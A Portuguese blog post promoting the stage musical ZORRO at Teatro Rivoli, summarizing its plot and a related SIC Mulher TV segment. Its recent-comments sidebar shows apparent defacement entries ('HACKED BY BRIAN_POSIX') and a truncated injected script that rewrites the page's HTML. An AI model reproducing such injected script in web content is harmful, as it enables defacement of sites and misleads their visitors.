oqueaconteceporai @ 18:31

Seg, 18/03/13

Um espetáculo musical que conta a história do lendário herói de máscara e espada. Projeto que reúne perto de 100 elementos, com um elenco de 18 atores e cantores, um cenário grandioso, figurinos de época, um investimento improvável em iluminação, som e sonoplastia, numa das mais emblemáticas salas do país, o Teatro Rivoli. São fatores que fazem de ZORRO um espetáculo imperdível!

ZORRO estrou na noite de carnaval com o Teatro Rivoli completamente esgotado! Em apenas 12 dias mais de 10.000 pessoas, entre miúdos e graúdos, aplaudiram bem alto este novo musical.

 

Esta é uma história sobre o herói que existe em cada um de nós, sobre a capacidade de aprender, de lutar por objetivos, de reerguer uma casa pela base quando o telhado cede.

Ao contrário de outros heróis, Zorro conquista a capa e a mascarilha não por magia ou mutações genéticas, mas porque se torna merecedor, por defender a honra de uma população, pela sua generosidade, esforço, e por descobrir que um herói não é só herói pelos outros mas COM os outros.

 

Começa mais um dia na Vila Garcia. Os habitantes enchem a praça de flores, de frutas, de especiarias. A alegria da manhã vem com o sol e os pregões dos vendedores. Mas eis que surgem os guardas de Dom Miguel, o governante da região, anunciando o corte ao acesso do poço que existe na Colina, a sua mansão. Em tempo de seca, quando a água se torna cada vez mais escassa e com o caminho para o poço vedado, como vão conseguir os Garcias continuar a manter as suas plantações e a fazer crescer a Vila?


É então que surge Zorro, o mais amado dos justiceiros. Zorro vem para acalmar a Vila, com a promessa de um futuro melhor. Acontece que Zorro está velho e cansado. As suas pernas já falham, e decide que é chegada a altura de treinar alguém para o substituir.


Mas quem? De entre todos os Garcias há apenas um rapaz franzino que se sobressai, pelos seus valores morais, pela sua honestidade. Mas este rapaz, Sancho, tem alguns receios e faz com que esse medo o impeça de seguir em frente na missão de auxiliar a Vila Garcia. Ao mesmo tempo, Dom Miguel descobre que há uma mina de ouro na Vila e o seu plano é precisamente tirar os Garcias das suas terras, para poder desenterrar esse ouro, enriquecendo ainda mais. Os Garcias, sem água, têm então de abandonar a Vila. Mas Sancho, empenhado em ajudar e movido pelo amor à sua terra, aceita finalmente vestir a capa e a mascarilha de Zorro e defender a população de Garcia.

 

Decidido a enfrentar Dom Miguel e a convencê-lo a voltar a deixar a população aceder à àgua do poço da Colina, apercebe-se que, pela iniciativa, pela coragem, pela justiça com que lida com os problemas, se está a transformar num herói de verdade.

 

Uma peça a não perder no Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO